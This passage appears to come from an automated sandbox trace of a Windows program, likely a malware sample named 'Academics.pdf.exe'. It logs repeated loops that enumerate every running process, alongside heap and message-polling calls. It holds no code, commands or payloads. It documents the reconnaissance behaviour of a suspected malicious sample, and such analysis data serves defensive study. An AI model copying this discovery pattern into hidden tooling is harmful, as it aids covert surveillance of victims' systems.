lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0310.114] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0310.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0310.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0310.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0310.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0310.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0310.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0310.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0310.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0310.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0310.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0310.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0310.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0310.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0310.127] CloseHandle (hObject=0x294) returned 1 [0310.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0310.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0310.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0310.127] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0310.127] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0310.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0310.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0310.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0310.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.128] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.140] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.146] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.146] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.147] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.148] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.150] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.152] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.155] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0310.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0310.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0310.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0310.162] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0310.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0310.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0310.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0310.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0310.166] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0310.167] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0310.168] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0310.169] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0310.170] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0310.171] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0310.171] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0310.172] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0310.173] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0310.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0310.175] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.175] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.176] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0310.177] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.178] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0310.179] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.180] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0310.180] CloseHandle (hObject=0x294) returned 1 [0310.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0310.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0310.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0310.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0310.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0310.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0310.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0310.181] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.183] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.188] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, 